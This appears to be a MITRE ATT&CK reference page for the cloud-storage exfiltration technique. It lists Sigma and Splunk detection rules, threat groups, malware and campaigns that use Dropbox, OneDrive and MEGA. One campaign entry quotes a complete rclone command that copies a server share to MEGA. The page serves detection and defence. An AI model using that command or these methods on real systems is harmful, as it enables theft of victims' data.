Exfiltration to Cloud Storage

T1567.002

Sub-technique of T1567 Exfiltration Over Web Service.View on attack.mitre.org

About this technique

Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.

Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.

Detection rules19

Rules on DetectionCode tagged with T1567.002.

Sigma13

RuleLevelLog source
Curl File Upload To File Sharing Websiteshighwindows / process_creation
DNS Query for Anonfiles.com Domain - DNS Clienthighwindows / NULL
DNS Query for Anonfiles.com Domain - Sysmonhighwindows / dns_query
PUA - Rclone Executionhighwindows / process_creation
PUA - Restic Backup Tool Executionhighwindows / process_creation
Suspicious Dropbox API Usagehighwindows / network_connection
DNS Query To MEGA Hosting Websitemediumwindows / dns_query
DNS Query To MEGA Hosting Website - DNS Clientmediumwindows / NULL
Rclone Activity via ProxymediumNULL / proxy
Rclone Config File Creationmediumwindows / file_event
DNS Query To Ufile.iolowwindows / dns_query
DNS Query To Ufile.io - DNS Clientlowwindows / NULL
Network Connection Initiated To Mega.nzlowwindows / network_connection

Splunk6

RuleTypeRiskData source
Cisco NVM - Rclone Execution With Network ActivityAnomalyNULLCisco Network Visibility Module Flow Data
Cisco Secure Firewall - Connection to File Sharing DomainAnomalyNULLCisco Secure Firewall Threat Defense Connection Event
Cisco Secure Firewall - Potential Data ExfiltrationAnomalyNULLCisco Secure Firewall Threat Defense Connection Event
Gsuite Drive Share In External EmailAnomalyNULLG Suite Drive
Windows Azure Storage Utility Execution Via CLIAnomalyNULLSysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2
Windows OneDrive Share Mounted via NetAnomalyNULLSysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2

Groups25

Show 1 more

Software16

Campaigns3

Procedure examples44

Groups25

Used byProcedure example
GroupAkira

Akira will exfiltrate victim data using applications such as Rclone.

GroupChimera

Chimera has exfiltrated stolen data to OneDrive accounts.

GroupCinnamon Tempest

Cinnamon Tempest has uploaded captured keystroke logs to the Alibaba Cloud Object Storage Service, Aliyun OSS.

GroupConfucius

Confucius has exfiltrated victim data to cloud storage service accounts.

GroupContagious Interview

Contagious Interview has exfiltrated stolen passwords to Dropbox.

GroupEarth Lusca

Earth Lusca has used the megacmd tool to upload stolen files from a victim network to MEGA.

GroupEmber Bear

Ember Bear has used tools such as Rclone to exfiltrate information from victim environments to cloud storage such as `mega.nz`.

GroupFIN7

FIN7 has exfiltrated stolen data to the MEGA file sharing site.

View all 25 groups examples

Software16

Used byProcedure example
MalwareBoomBox

BoomBox can upload data to dedicated per-victim folders in Dropbox.

MalwareBoxCaon

BoxCaon has the capability to download folders' contents on the system and upload the results back to its Dropbox drive.

MalwareClambling

Clambling can send files from a victim's machine to Dropbox.

MalwareCreepyDrive

CreepyDrive can use cloud services including OneDrive for data exfiltration.

MalwareCrutch

Crutch has exfiltrated stolen data to Dropbox.

ToolEmpire

Empire can use Dropbox for data exfiltration.

MalwareHAMMERTOSS

HAMMERTOSS exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later.

MalwareOctopus

Octopus has exfiltrated data to file sharing sites.

View all 16 software examples

Campaigns3

Used byProcedure example
CampaignAPT41 DUST

APT41 DUST exfiltrated collected information to OneDrive.

CampaignC0015

During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`.

CampaignOperation Dream Job

During Operation Dream Job, Lazarus Group used a custom build of open-source command-line dbxcli to exfiltrate stolen data to Dropbox.

Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.